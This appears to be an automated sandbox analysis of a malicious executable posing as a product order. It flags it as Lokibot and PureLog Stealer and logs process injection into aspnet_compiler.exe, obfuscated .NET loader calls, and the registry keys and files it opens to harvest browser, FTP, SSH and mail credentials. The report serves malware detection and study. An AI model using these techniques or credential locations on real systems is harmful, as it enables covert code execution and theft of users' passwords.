Source:	Binary string: aspnet_compiler.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3204619498.0000000000012000.00000002.00000001.01000000.00000007.sdmp

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: Products Order.exe, M8DvjIJE7uNNFCdohc.cs

.Net Code: co2gpZP5RqCLJDNbYh(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: Products Order.exe, QMx9nrlke0nNv5xie5.cs

.Net Code: QMxl9nrke System.Reflection.Assembly.Load(byte[])

Yara detected aPLib compressed binary

Source: Yara match	File source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Products Order.exe.12aa64d0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Products Order.exe PID: 3436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 5352, type: MEMORYSTR

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AD4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: 2_2_00402AC0 push eax; ret		2_2_00402AFC

Source: Products Order.exe, I3ySmwElCsriwLZOkO.cs	High entropy of concatenated method names: 'uy2E7Q04y', 'nj83CchQq0BirOfv59', 'jpOFcFMEHfsMs86Jhn', 'oRoYXqA6jRO4Xf0mpv', 'uZlnM2lNHCx8nPI8AT', 'gE8VKONMnk0yatiwt0', 'UQyPfYYQPYjjTGOuGl', 'NVGoNUaLu8Y8bxS7QP'
Source: Products Order.exe, M8DvjIJE7uNNFCdohc.cs	High entropy of concatenated method names: 'xPcjKlyZG63SuLEU3rh', 'evoOipy0DvRetvI86Cx', 'MQjlM4qR8p', 'zOtfHty1fSIGsZLBf9b', 'vhet5CyCuWlOYvhxkm1', 'a67QRDyJVOPOVHcGYB4', 'LYOMdlyH9lWBlstORxk', 'KDikMXewCI', 'l35lhCNtRm', 'BOnlRyYIqV'

Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\Desktop\Products Order.exe	Memory allocated: A30000 memory reserve \| memory write watch			Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Memory allocated: 1A8E0000 memory reserve \| memory write watch			Jump to behavior

Source: C:\Users\user\Desktop\Products Order.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Users\user\Desktop\Products Order.exe TID: 5052	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe TID: 6148	Thread sleep time: -420000s >= -30000s			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,

2_2_00403D74

Source: C:\Users\user\Desktop\Products Order.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000			Jump to behavior

Source: Products Order.exe, 00000000.00000002.1969470285.0000000012940000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: Products Order.exe, 00000000.00000002.1969470285.0000000012989000.00000004.00000800.00020000.00000000.sdmp, Products Order.exe, 00000000.00000002.1969470285.00000000129D1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKg
Source: Products Order.exe	Binary or memory string: `hGfs79njrfh4rlW/g/ELQPl2byr
Source: aspnet_compiler.exe, 00000002.00000002.3204897255.0000000000778000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
Source: Products Order.exe, 00000000.00000002.1969470285.0000000012A19000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]

2_2_0040317B

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Code function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,

2_2_00402B7C

Source: C:\Users\user\Desktop\Products Order.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\Products Order.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Products Order.exe

Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write

Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Products Order.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Products Order.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000	Jump to behavior
Source: C:\Users\user\Desktop\Products Order.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 2DE008	Jump to behavior

Source: C:\Users\user\Desktop\Products Order.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"

Jump to behavior

Source: C:\Users\user\Desktop\Products Order.exe

Queries volume information: C:\Users\user\Desktop\Products Order.exe VolumeInformation

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Lokibot

Source: Yara match	File source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1969470285.0000000012AA6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3204702341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1967088480.0000000002A2D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Products Order.exe PID: 3436, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: aspnet_compiler.exe PID: 5352, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 00000002.00000002.3204897255.0000000000778000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Yara detected PureLog Stealer

Source: Yara match	File source: Products Order.exe, type: SAMPLE
Source: Yara match	File source: 0.0.Products Order.exe.430000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.1960275029.00000000004B6000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: PopPassword		2_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe	Code function: SmtpPassword		2_2_0040D069

Source: Yara match	File source: 0.2.Products Order.exe.12aa64d0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.aspnet_compiler.exe.400000.1.unpack, type: UNPACKEDPE
